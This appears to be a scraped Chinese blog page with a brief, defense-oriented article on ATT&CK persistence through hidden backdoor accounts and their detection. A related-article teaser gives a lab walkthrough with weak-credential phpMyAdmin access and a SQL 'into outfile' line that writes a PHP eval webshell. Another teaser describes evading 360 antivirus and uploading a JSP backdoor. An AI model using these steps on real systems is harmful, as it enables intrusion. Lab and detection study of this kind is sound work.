ATT&CK v12版本战术实战研究—持久化（二）

8月前作者：SECISLAND安全官分类：Toy博客阅读(27) 违法举报

这篇具有很好参考价值的文章主要介绍了ATT&CK v12版本战术实战研究—持久化（二）。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

一、前言

前几期文章中，我们介绍了ATT&CK中侦察、资源开发、初始访问、执行战术、持久化战术的知识。那么从前文中介绍的相关持久化子技术来开展测试，进行更深一步的分析。本文主要内容是介绍攻击者在运用持久化子技术时，在相关的资产服务器或者在PC机器上所产生的特征数据进行分析，使安全运维人员在后续工作中应当如何去进行预防和快速响应。

二、持久化战术

1、后门账户

1.1 介绍

攻击者可以创建一个后门账户，此后门账户用来维持对受害系统的持久性访问。同时将后门账户进行隐藏，日常操作中，无法发现此账户的存在。

1.2 Windows资产后门账号事件

a）重要资产发生异常账户创建

ATT&CK v12版本战术实战研究—持久化（二）

b）异常账户注册表键值被篡改

根据对异常账户创建事件的监控，对应到异常账户在注册表中对应的键值，监控该键值的篡改操作，进行更细粒度化监控。文章来源地址https://www.toymoban.com/news/detail-436829.html

ATT&CK v12版本战术实战研究—持久化（二）

到了这里，关于ATT&CK v12版本战术实战研究—持久化（二）的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

【红蓝攻防鸿篇巨著】ATT&CK视角下的红蓝对抗实战指南

【文末送书】今天推荐一本网安领域优质书籍《ATTCK视角下的红蓝对抗实战指南》，本文将从其亮点与内容出发，详细阐发其对于网安从业人员的重要性与益处。根据中国互联网络信息中心（CNNIC）发布的第51次《中国互联网络发展状况统计报告》，截至2022年12月，我国网民规

2024年02月07日
浏览(37)
12.redis 持久化

redis 是一个内存数据库，把数据存储在内存中的，内存中的数据是不持久的，要想做到持久，就需要让redis把数据存储到硬盘上。为了保证速度块，数据肯定还是得在内存中，但是为了持久化，数据还得想办法存储在硬盘上。 RDB = Redis DataBase 定期备份 RDB 定期的把 Redis 内存中

2024年02月09日
浏览(25)
红日ATT&CK系列靶场(-)简记

Step 1》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描发现：/phpMyadmin Step 2 》漏洞利用 1.弱口令 http://192.168.92.100/phpMyadmin root/root 登录成功 2.getshell select @@basedir //查绝对路径 into outfile 写马 select \\\'?php eval($_POST[cmd]);?\\\' into outfile \\\'C://绝对路径/shell.

2024年02月09日
浏览(35)
红日靶场2 ATT&&CK攻击

360免杀其实没有你想象的那么难首先最重要的是你要用免杀脚本对你所生成的木马病毒进行加密然后加密系统的内核，就是上一篇文章所提及的是通过两次加密之后所输出的结果，让360无法感知到，然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去，这个不会

2024年01月18日
浏览(34)
【12期】谈一谈redis两种持久化机制的区别？

RDB方案可以在规定时间间隔内创建数据集的时间点快照。 AOF方案记录了服务器执行的所有写操作命令，并在服务器启动时通过重新执行这些命令来还原数据集。AOF文件完全遵循Redis协议格式保存，新命令会被追加到文件末尾。此外，Redis还能在后台对AOF文件重写以确保不超过

2024年02月11日
浏览(29)
项目实战 — 消息队列（4）{消息持久化}

目录一、消息存储格式设计 🍅 1、queue_data.txt：保存消息的内容 🍅 2、queue_stat.txt：保存消息的统计信息二、消息序列化三、自定义异常类四、创建MessageFileManger类 🍅 1、约定消息文件所在的目录和文件名字 🍅 2、队列的统计信息 🍅 3、创建队列对应

2024年02月14日
浏览(31)
ToBeWritten之基于ATT&CK的模拟攻击：闭环的防御与安全运营

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬请移步知识星球感谢大家一直以来对我CSDN博客的关注和支持，但

2024年02月09日
浏览(35)
【RabbitMQ 实战】10 消息持久化和存储原理

rabbitmq的持久化分为三个部分：交换器的持久化。队列的持久化。消息的持久化。 1.1.1 交换器持久化交换器的持久化是通过在声明交换器时，指定Durability参数为durable实现的。若交换器不设置持久化，在rabbitmq服务重启之后，相关的交换器元数据会丢失，但消息不会丢失，

2024年02月07日
浏览(31)
k8s1.28.8版本安装prometheus并持久化数据

本文参考前置要求: 已经部署了NFS或者其他存储的K8s集群. 这里注意networkpolicies网络策略问题，可以后面删除这个策略，这里可以查看我之前的文档。部署kube-prometheus 这里是配置好才执行这个，我们还没有配置存储什么的需要进行修改持久化数据我这里用的是NFS创建动态的

2024年04月15日
浏览(25)
uniapp项目实战第五章：小程序Pinia持久化

说明：项目中 Pinia 用法平时完全一致，主要解决持久化插件兼容性问题。持久化存储插件持久化存储插件： pinia-plugin-persistedstate 插件默认使用 localStorage 实现持久化，小程序端不兼容，需要替换持久化 API。网页端持久化 API 多端持久化 API 参考代码现在可以持续化了

2024年02月01日
浏览(32)